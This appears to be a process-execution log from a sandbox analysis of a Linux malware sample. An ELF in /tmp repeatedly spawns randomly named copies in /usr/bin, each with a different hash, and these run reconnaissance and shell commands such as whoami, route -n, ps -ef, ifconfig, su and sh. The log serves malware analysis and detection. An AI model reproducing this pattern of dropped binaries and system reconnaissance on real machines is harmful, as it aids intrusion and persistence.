                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:/usr/bin/bbdupdfrbl "echo \"find\"" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:/usr/bin/bbdupdfrbl whoami 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:/usr/bin/bbdupdfrbl "route -n" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:38
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/bbdupdfrbl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:ce8ed5c0103d476aae51c2e02825f9cd

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:/usr/bin/lqmgtequuz su 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:/usr/bin/lqmgtequuz "ls -la" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:/usr/bin/lqmgtequuz "grep \"A\"" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:/usr/bin/lqmgtequuz "ps -ef" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:/usr/bin/lqmgtequuz "echo \"find\"" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:43
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/lqmgtequuz
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:89dc58010dc1112c748954232f0e45bc

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:/usr/bin/vzezokfask "echo \"find\"" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:/usr/bin/vzezokfask sh 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:/usr/bin/vzezokfask "ifconfig eth0" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:/usr/bin/vzezokfask ls 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:/usr/bin/vzezokfask "ps -ef" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:48
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/vzezokfask
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:41de595dc0b051eb3e53023ef6d8b788

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:/usr/bin/skjzlhozvl "route -n" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:/usr/bin/skjzlhozvl who 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:/usr/bin/skjzlhozvl "route -n" 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:/usr/bin/skjzlhozvl uptime 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/tmp/UDMp3dZ7nc.elf
                                                                              Arguments:-
                                                                              File size:548638 bytes
                                                                              MD5 hash:22cd21f5cfc3ea409f3a05585d903949

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:/usr/bin/skjzlhozvl uptime 6261
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:29:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/bin/skjzlhozvl
                                                                              Arguments:-
                                                                              File size:548660 bytes
                                                                              MD5 hash:4d269bc77499545c56e853c6f0db0bb4

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/lib/systemd/systemd
                                                                              Arguments:-
                                                                              File size:1620224 bytes
                                                                              MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                              Start time (UTC):14:27:53
                                                                              Start date (UTC):03/01/2025
                                                                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                              File size:22760 bytes
                                                                              MD5 hash:3633b075f40283ec938a2a6a89671b0e